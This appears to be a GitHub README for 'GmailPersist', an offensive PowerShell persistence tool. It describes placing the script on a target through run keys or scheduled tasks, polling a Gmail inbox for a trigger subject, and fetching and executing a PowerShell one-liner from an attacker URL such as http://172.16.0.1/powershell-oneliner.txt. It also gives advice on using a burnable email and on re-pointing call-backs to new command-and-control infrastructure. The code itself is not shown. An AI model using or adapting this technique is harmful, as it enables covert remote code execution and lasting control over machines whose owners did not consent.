harleyQu1nn/GmailPersist

Gmail Knocker

Gmail Persist

Gmail Knocker inspired by @enigma0x3's OutlookPersistence script

SYNOPSIS

Uses a designated Gmail Email account as the middle man for persistence.

[!] Needs to be placed on target to persist i.e. (registry, run key, schtask, etc..)
[!] The script includes username and password for the email so ensure a burnable email is used
[!] The script doesn't delete emails because it is only getting the feed ,so after every call-in it will execute the URL until the email is deleted.

DESCRIPTION

This script uses the provided Gmail Address and Password to retrieve a feed of the gmail inbox. The feed is only the first ~20 emails and only includes ~200 characters of the body. After it retrieves the feed it looks for the "Trigger word" which is the email subject and also the attacker email which could be the same Gmail email address. Once there is a match it takes the body which should look like:
http://172.16.0.1/powershell-oneliner.txt

EXAMPLE

``` PS> ./GmailPersist.ps1 ```
Now send an email with the following information:

• FROM: (ATTACKER EMAIL)
• TO: (GMAIL ACCOUNT)
• SUBJECT: (Trigger Word)
• BODY:
  http://172.16.0.1/powershell.exe-oneliner.txt

Main Usage

This is a knocker so a persisted call-back can easily be changed to call-back to a new C2 infrastructure. Leave an email in the inbox so once the script is kicked off it will kick off and a call-back will be recieved.